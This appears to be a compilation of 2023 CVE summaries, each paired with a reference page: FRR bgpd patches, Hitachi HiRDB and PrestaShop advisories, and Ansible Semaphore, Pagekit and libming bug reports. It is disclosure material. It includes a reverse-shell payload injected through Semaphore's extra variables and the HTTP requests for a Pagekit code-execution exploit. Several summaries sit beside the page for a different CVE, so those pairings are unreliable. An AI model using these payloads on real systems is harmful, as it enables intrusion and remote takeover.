*   Topotests Ubuntu 18.04 arm8 part 6
*   Addresssanitizer topotests part 8
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 amd64 part 6

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 21, 2023

**

**Continuous Integration Result: SUCCESSFUL**

Congratulations, this patch passed basic tests

Tested-by: NetDEF / OpenSourceRouting.org CI System

CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

 donaldsharp merged commit ff4c767 into FRRouting:master

Aug 21, 2023

6 checks passed

 mergify bot mentioned this pull request

Aug 21, 2023

bgpd: Check the length of the rcv software version (backport #14241) #14250

Merged

 ton31337 deleted the fix/software\_version\_capability\_handling\_len branch

August 21, 2023 13:53

donaldsharp added a commit that referenced this pull request

Aug 21, 2023

          Merge pull request #14250 from FRRouting/mergify/bp/stable/9.0/pr-14241
        

          d8238e9
        

bgpd: Check the length of the rcv software version (backport #14241)

Sign up for free **to join this conversation on GitHub**. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

backport bgp master size/S

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

None yet

3 participants

CVE-2023-41361: bgpd: Check the length of the rcv software version by ton31337 · Pull Request #14241 · FRRouting/frr

An issue was discovered in FRRouting FRR through 9.0. bgpd/bgp_packet.c processes NLRIs if the attribute length is zero.

    3  0x00007f423aa42476 in __GI_raise (sig=sig@entry=11) at ../sysdeps/posix/raise.c:26
    4  0x00007f423aef9740 in core_handler (signo=11, siginfo=0x7fffc414deb0, context=<optimized out>) at lib/sigevent.c:246
    5  <signal handler called>
    6  0x0000564dea2fc71e in route_set_aspath_prepend (rule=0x564debd66d50, prefix=0x7fffc414ea30, object=0x7fffc414e400)
        at bgpd/bgp_routemap.c:2258
    7  0x00007f423aeec7e0 in route_map_apply_ext (map=<optimized out>, prefix=prefix@entry=0x7fffc414ea30,
        match_object=match_object@entry=0x7fffc414e400, set_object=set_object@entry=0x7fffc414e400, pref=pref@entry=0x0) at lib/routemap.c:2690
    8  0x0000564dea2d277e in bgp_input_modifier (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, attr=attr@entry=0x7fffc414e770,
        afi=afi@entry=AFI_IP, safi=safi@entry=SAFI_UNICAST, rmap_name=rmap_name@entry=0x0, label=0x0, num_labels=0, dest=0x564debdd5130)
        at bgpd/bgp_route.c:1772
    9  0x0000564dea2df762 in bgp_update (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, addpath_id=addpath_id@entry=0,
        attr=0x7fffc414eb50, afi=afi@entry=AFI_IP, safi=<optimized out>, safi@entry=SAFI_UNICAST, type=9, sub_type=0, prd=0x0, label=0x0,
        num_labels=0, soft_reconfig=0, evpn=0x0) at bgpd/bgp_route.c:4374
    10 0x0000564dea2e2047 in bgp_nlri_parse_ip (peer=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, packet=0x7fffc414eaf0)
        at bgpd/bgp_route.c:6249
    11 0x0000564dea2c5a58 in bgp_nlri_parse (peer=peer@entry=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50,
        packet=packet@entry=0x7fffc414eaf0, mp_withdraw=mp_withdraw@entry=false) at bgpd/bgp_packet.c:339
    12 0x0000564dea2c5d66 in bgp_update_receive (peer=peer@entry=0x7f4238f59010, size=size@entry=109) at bgpd/bgp_packet.c:2024
    13 0x0000564dea2c901d in bgp_process_packet (thread=<optimized out>) at bgpd/bgp_packet.c:2933
    14 0x00007f423af0bf71 in event_call (thread=thread@entry=0x7fffc414ee40) at lib/event.c:1995
    15 0x00007f423aebb198 in frr_run (master=0x564deb73c670) at lib/libfrr.c:1213
    16 0x0000564dea261b83 in main (argc=<optimized out>, argv=<optimized out>) at bgpd/bgp_main.c:505
    

    frr version 9.1-dev-MyOwnFRRVersion
    frr defaults traditional
    hostname ip-172-31-13-140
    log file /tmp/debug.log
    log syslog
    service integrated-vtysh-config
    !
    debug bgp keepalives
    debug bgp neighbor-events
    debug bgp updates in
    debug bgp updates out
    !
    router bgp 100
     bgp router-id 9.9.9.9
     no bgp ebgp-requires-policy
     bgp bestpath aigp
     neighbor 172.31.2.47 remote-as 200
     !
     address-family ipv4 unicast
      neighbor 172.31.2.47 default-originate
      neighbor 172.31.2.47 route-map RM_IN in
     exit-address-family
    exit
    !
    route-map RM_IN permit 10
     set as-path prepend 200
    exit
    !
    

The issue is that we try to process NLRIs even if the attribute length is 0.

Later bgp\_update() will handle route-maps and a crash occurs because all the attributes are NULL, including aspath, where we dereference.

A value of 0 indicates that neither the Network Layer  
Reachability Information field nor the Path Attribute field is  
present in this UPDATE message.

But with a fuzzed UPDATE message this can be faked. I think it's reasonable to skip processing NLRIs if both update\_len and attribute\_len are 0.

CVE-2023-41358: bgpd: Do not process NLRIs if the attribute length is zero by ton31337 · Pull Request #14260 · FRRouting/frr

An issue was discovered in FRRouting FRR through 9.0. bgpd/bgp_packet.c can read the initial byte of the ORF header in an ahead-of-stream situation.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-41360: bgpd: Don't read the first byte of ORF header if we are ahead of stream by ton31337 · Pull Request #14245 · FRRouting/frr

Insufficient Logging vulnerability in Hitachi HiRDB Server, HiRDB Server With Addtional Function, HiRDB Structured Data Access Facility.This issue affects HiRDB Server: before 09-60-39, before 09-65-23, before 10-01-10, before 10-03-12, before 10-04-06, before 10-05-06, before 10-06-02; HiRDB Server With Addtional Function: before 09-60-2M, before 09-65-/W; HiRDB Structured Data Access Facility: before 09-60-39, before 10-03-12, before 10-04-06, before 10-06-02.



*   Security Information ID
*   Vulnerability description
*   Affected products
*   Fixed products
*   Revision history

Update: August 29, 2023

A Vulnerability (CVE-2023-1995) exists in HiRDB.

**Security Information ID**

hitachi-sec-2023-133

**Affected products**

The information is organized under the following headings:  

**(Example)  
Product name: Gives the name of the affected product.**

Version:

Platform

Gives the affected version.

**\- HiRDB V10**

**Product name: HiRDB Server Version 10  
**

Version(s):

AIX

10-06 to 10-06-01, 10-05 to 10-05-05, 10-04 to 10-04-04, 10-03 to 10-03-11, 10-02 to 10-02-12, 10-01 to 10-01-09, 10-00 to 10-00-09

HP-UX

10-05 to 10-05-05, 10-04 to 10-04-04, 10-03 to 10-03-10, 10-02 to 10-02-12, 10-01 to 10-01-09, 10-00 to 10-00-09

Linux

10-06 to 10-06-01, 10-05 to 10-05-05, 10-04 to 10-04-05, 10-03 to 10-03-10, 10-02 to 10-02-12, 10-01 to 10-01-09, 10-00 to 10-00-09

Windows

10-06 to 10-06-01, 10-05 to 10-05-05, 10-04 to 10-04-04, 10-03 to 10-03-10, 10-02 to 10-02-12, 10-01 to 10-01-09, 10-00 to 10-00-09

**Product name: HiRDB Structured Data Access Facility Version 10  
**

Version(s):

Linux

10-06 to 10-06-01, 10-04 to 10-04-05, 10-03 to 10-03-10, 10-02 to 10-02-12, 10-01 to 10-01-03

**\- HiRDB V9**

**Product name: HiRDB Server Version 9  
**

Version(s):

AIX

09-66 to 09-66-16, 09-65 to 09-65-22, 09-60 to 09-60-38, 09-50 to 09-50-37, 09-04 to 09-04-45, 09-03 to 09-03-31, 09-02 to 09-02-32, 09-01 to 09-01-24, 09-00 to 09-00-32

HP-UX

09-66 to 09-66-16, 09-65 to 09-65-22, 09-60 to 09-60-37, 09-50 to 09-50-37, 09-04 to 09-04-45, 09-03 to 09-03-27, 09-02 to 09-02-32, 09-01 to 09-01-24, 09-00 to 09-00-30

Solaris

09-04 to 09-04-31, 09-03 to 09-03-27, 09-02 to 09-02-32, 09-01 to 09-01-24, 09-00 to 09-00-30

Linux

09-66 to 09-66-16, 09-65 to 09-65-22, 09-60 to 09-60-37, 09-50 to 09-50-37, 09-04 to 09-04-45, 09-03 to 09-03-27, 09-02 to 09-02-32, 09-01 to 09-01-24, 09-00 to 09-00-30

Windows

09-66 to 09-66-16, 09-65 to 09-65-22, 09-60 to 09-60-37, 09-50 to 09-50-37, 09-04 to 09-04-45, 09-03 to 09-03-27, 09-02 to 09-02-32, 09-01 to 09-01-24, 09-00 to 09-00-30

**Product name: HiRDB Server with Additional Function Version 9  
**

Version(s):

AIX

09-66 to 09-66-/P, 09-65 to 09-65-/V, 09-60 to 09-60-2L, 09-50 to 09-50-2K, 09-04 to 09-04-2S, 09-03 to 09-03-2E, 09-02 to 09-02-2F, 09-01 to 09-01-/X, 09-00 to 09-00-2F

HP-UX

09-66 to 09-66-/P, 09-65 to 09-65-/V, 09-60 to 09-60-2K, 09-50 to 09-50-2K, 09-04 to 09-04-2S, 09-03 to 09-03-2A, 09-02 to 09-02-2F, 09-01 to 09-01-/X, 09-00 to 09-00-2D

Linux

09-66 to 09-66-/P, 09-65 to 09-65-/V, 09-60 to 09-60-2K, 09-50 to 09-50-2K, 09-04 to 09-04-2S, 09-03 to 09-03-2A, 09-02 to 09-02-2F, 09-01 to 09-01-/X, 09-00 to 09-00-2D

Windows

09-66 to 09-66-/P, 09-65 to 09-65-/V, 09-60 to 09-60-2K, 09-50 to 09-50-2K, 09-04 to 09-04-2S, 09-03 to 09-03-2A, 09-02 to 09-02-2F, 09-01 to 09-01-/X, 09-00 to 09-00-2D

**Product name: HiRDB Server Version 9(32)  
**

Version(s):

Windows

09-66 to 09-66-16, 09-65 to 09-65-22, 09-60 to 09-60-37, 09-50 to 09-50-37, 09-04 to 09-04-45, 09-03 to 09-03-27, 09-02 to 09-02-32

**Product name: HiRDB Server with Additional Function Version 9(32)  
**

Version(s):

Windows

09-66 to 09-66-/P, 09-65 to 09-65-/V, 09-60 to 09-60-2K, 09-50 to 09-50-2K, 09-04 to 09-04-2S, 09-03 to 09-03-2A, 09-02 to 09-02-2F

**Product name: HiRDB Structured Data Access Facility Version 9  
**

Version(s):

Linux

09-66 to 09-66-06, 09-60 to 09-60-37

**Fixed products**

The information is organized under the following headings:  

**(Example)  
Product name: Gives the name of the fixed product.**

Version:

Platform

Gives the fixed version, and release date.

Scheduled version:

Platform

Gives the fixed version scheduled to be released.

**\- HiRDB V10**

**Product name: HiRDB Server Version 10  
**

Version(s):

AIX, Linux, Windows

10-06-02 July 26, 2023

AIX, HP-UX, Linux, Windows

10-05-06 August 21, 2023

10-04-06 March 30, 2023

10-03-12 June 28, 2023

10-01-10 April 17, 2023

**Product name: HiRDB Structured Data Access Facility Version 10  
**

Version(s):

Linux

10-06-02 July 26, 2023

10-04-06 March 30, 2023

10-03-12 June 28, 2023

**\- HiRDB V9**

**Product name: HiRDB Server Version 9  
**

Version(s):

AIX, HP-UX, Linux, Windows

09-65-23 May 24, 2023

09-60-39 July 11, 2023

Windows

09-50-38 March 28, 2023

**Product name: HiRDB Server with Additional Function Version 9  
**

Version(s):

AIX, HP-UX, Linux, Windows

09-65-/W May 24, 2023

09-60-2M July 11, 2023

Windows

09-50-2L March 28, 2023

**Product name: HiRDB Server Version 9(32)  
**

Version(s):

Windows

09-65-23 May 24, 2023

09-60-39 July 11, 2023

**Product name: HiRDB Server with Additional Function Version 9(32)  
**

Version(s):

Windows

09-65-/W May 24, 2023

09-60-2M July 11, 2023

**Product name: HiRDB Structured Data Access Facility Version 9  
**

Version(s):

Linux

09-60-39 July 11, 2023

For details on the fixed products, contact your Hitachi support service representative.

**Revision history**

August 29, 2023

This page is released.

*   Hitachi, Ltd. (hereinafter referred to as "Hitachi") tries to provide accurate information about security countermeasures. However, since information about security problems constantly changes, the contents of these Web pages are subject to change without prior notice. When referencing information, please confirm that you are referencing the latest information.
*   The Web pages include information about products that are developed by non-Hitachi software developers. Vulnerability information about those products is based on the information provided or disclosed by those developers. Although Hitachi is careful about the accuracy and completeness of this information, the contents of the Web pages may change depending on the changes made by the developers.
*   The Web pages are intended to provide vulnerability information only, and Hitachi shall not have any legal responsibility for the information contained in them. Hitachi shall not be liable for any consequences arising out of or in connection with the security countermeasures or other actions that you will take or have taken (or not taken) by yourself.
*   The links to other web sites are valid at the time of the release of the page. Although Hitachi makes an effort to maintain the links, Hitachi cannot guarantee their permanent availability.

CVE-2023-1995: hitachi-sec-2023-133: Vulnerability in HiRDB

Theme Volty CMS Blog up to version v4.0.1 was discovered to contain a SQL injection vulnerability via the id parameter at /tvcmsblog/single.

In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39650
*   **Published at**: 2023-08-24
*   **Platform**: PrestaShop
*   **Product**: tvcmsblog
*   **Impacted release**: <= 4.0.1 (4.0.2 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method TvcmsBlogSingleModuleFrontController::run() have a sensitive SQL call that can be executed with a trivial HTTP call and exploited to forge a SQL injection.

If your server do not manage correctly these HTTP headers (which will be the case for all servers not managed by a professional system administrator), you are concerned:

*   CLIENT\_IP
*   X\_FORWARDED\_FOR
*   X\_FORWARDED
*   FORWARDED\_FOR
*   FORWARDED

See recommendations if needed about this.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.1**

    --- 4.0.1/tvcmsblog/controllers/front/single.php
    +++ 4.0.2/tvcmsblog/controllers/front/single.php
    ...
        public function initContent()
        {
            $ipaddress = '';
            if (isset($_SERVER['HTTP_CLIENT_IP'])) {
                $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
            } elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED'];
            } elseif (isset($_SERVER['REMOTE_ADDR'])) {
                $ipaddress = $_SERVER['REMOTE_ADDR'];
            } else {
                $ipaddress = 'UNKNOWN';
            }
            $blogid = $this->blogpost['id_tvcmsposts'];
    
    -       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . $blogid . ' AND `ipadress` = \'' . $ipaddress . '\' ';
    +       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . (int) $blogid . ' AND `ipadress` = \'' . pSQL($ipaddress) . '\' ';
            $ans = Db::getInstance()->executeS($select_data);
    
            if (1 > $ans[0]['max_id']) {
                $dataquery = 'INSERT INTO `' . _DB_PREFIX_ . 'tvcmsposts_view`
                                    SET 
    -                                   `id_tvcmsposts` = ' . $blogid . ',
    +                                   `id_tvcmsposts` = ' . (int) $blogid . ',
    -                                    ipadress = \'' . $ipaddress . '\'';
    +                                    ipadress = \'' . pSQL($ipaddress) . '\'';
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmsblog**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   These HTTP headers are not supposed to be used on a final application, since they should be used only if REMOTE_ADDR is allowed with modules like mod\_remoteip for Apache2, so you should auto-delete them if you are not behind a well setup load-balancer or reverse proxy.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

The author provided a patch, but it still contains all critical vulnerabilities.

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-08-24

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

CVE-2023-39650: [CVE-2023-39650] Improper neutralization of SQL parameters in Theme Volty CMS Blog module for PrestaShop

A memory leak flaw was found in nft_set_catchall_flush in net/netfilter/nf_tables_api.c in the Linux Kernel. This issue may allow a local attacker to cause a double-deactivations of catchall elements, which results in a memory leak.

'2235470?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-4569: Invalid Bug ID

An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.

\---------------------------------------------------------------

\[VulnerabilityType Other\]

Remote Command Execution (RCE)

\---------------------------------------------------------------

\[Affected Component\]

Ansible Semaphore includes a feature called "Extra Variables." This feature can be accessed at https://<semaphore-endpoint>/project/id/environment and is directly associated with the ansible-playbook --extra-vars flag.

\---------------------------------------------------------------

\[Attack Type\]

Remote

\---------------------------------------------------------------

\[Impact Code execution\]

true

\---------------------------------------------------------------

\[Impact Denial of Service\]

true

\---------------------------------------------------------------

\[Impact Escalation of Privileges\]

true

\---------------------------------------------------------------

\[Impact Information Disclosure\]

true

\---------------------------------------------------------------

\[Attack Vectors\]

The --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server. Payload:

{"ansible\_user": "{{ lookup('ansible.builtin.pipe', \\"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\\") }}"}

\---------------------------------------------------------------

\[Has vendor confirmed\]

true

\---------------------------------------------------------------

\[Discoverer\]

@alevsk

\---------------------------------------------------------------

\[Reference\]

https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/

\---------------------------------------------------------------

\[Vendor of Product\]

ansible semaphore

\---------------------------------------------------------------

\[Affected Product Code Base\]

ansible semaphore v2.8.90

\---------------------------------------------------------------

CVE-2023-39059: CVE-2023-39059

An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php

**Problem**

**There is a logical flaw that leads to obtaining shell access.**

**Technical Details**

*   Pagekit version: 1.0.18
*   Webserver: nginx
*   Database: mysql
*   PHP Version: 7.4

Vulnerability Path:  
app/installer/src/Controller/UpdateController.php  
Lines 32-72: downloadAction and updateAction functions  
The downloadAction function retrieves a file from a remote location to the local system.  
The updateAction function reads the downloaded file.  
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.  
It includes the app/installer/requirements.php file from the remotely fetched file.  
This can lead to remote code execution.  
Based on this, constructing a zip file as follows:  
pagekit.zip

The data package is as follows

    POST /index.php/admin/system/update/download HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost/index.php/admin/system/update/download
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
    

    POST /index.php/admin/system/update/update HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost /index.php/admin/system/update/update
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    _csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

CVE-2023-41005: There is a logical flaw that leads to obtaining shell access. · Issue #977 · pagekit/pagekit

Buffer Overflow vulnerability in Libming Libming v.0.4.8 allows a remote attacker to cause a denial of service via a crafted .swf file to the makeswf function.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

A heap buffer overflow occurs when makeswf parse a invalid swf file, and the filename extension is .swf.

**Test Environment**

Ubuntu 20.04, 64 bit  
libming (master 04aee52)

**Steps to reproduce**

1.  compile libming with ASAN

    $ CC="clang -fsanitize=address,fuzzer-no-link -g" CFLAGS+=" -fcommon" ./configure 
    $ make
    

2.  Download the poc file from here and run cmd  
    $ makeswf $POC

**ASAN report**

    $ ./bin_asan/bin/makeswf ./poc-makeswf-04aee52-r_readc-HBO.swf
    Output file name: out.swf
    Output compression level: 9
    Output SWF version: 6
    =================================================================
    ==5625==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60800000013f at pc 0x0000004f15b5 bp 0x7fff376560d0 sp 0x7fff376560c8
    WRITE of size 1 at 0x60800000013f thread T0
        #0 0x4f15b4 in r_readc /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:264:34
        #1 0x4f1a37 in getbits /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:143:18
        #2 0x4f1656 in rect /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:169:9
        #3 0x4efe15 in openswf /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:303:2
        #4 0x4eedbe in newSWFPrebuiltClip_fromInput /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:1302:8
        #5 0x4cbea3 in embed_swf /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:699:14
        #6 0x4ca4d9 in main /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:401:4
        #7 0x7f0aa6b3d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
        #8 0x41c5a8 in _start (/opt/disk/marsman/libming/04aee52/bin_asan/bin/makeswf+0x41c5a8)
    
    0x60800000013f is located 199 bytes to the right of 88-byte region [0x608000000020,0x608000000078)
    allocated by thread T0 here:
        #0 0x4975fd in malloc /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
        #1 0x4ef8d8 in openswf /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:271:41
        #2 0x4eedbe in newSWFPrebuiltClip_fromInput /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:1302:8
        #3 0x4cbea3 in embed_swf /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:699:14
        #4 0x4ca4d9 in main /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:401:4
        #5 0x7f0aa6b3d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:264:34 in r_readc
    Shadow bytes around the buggy address:
      0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
      0x0c107fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c107fff8020: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa
      0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==5625==ABORTING
    

1 participant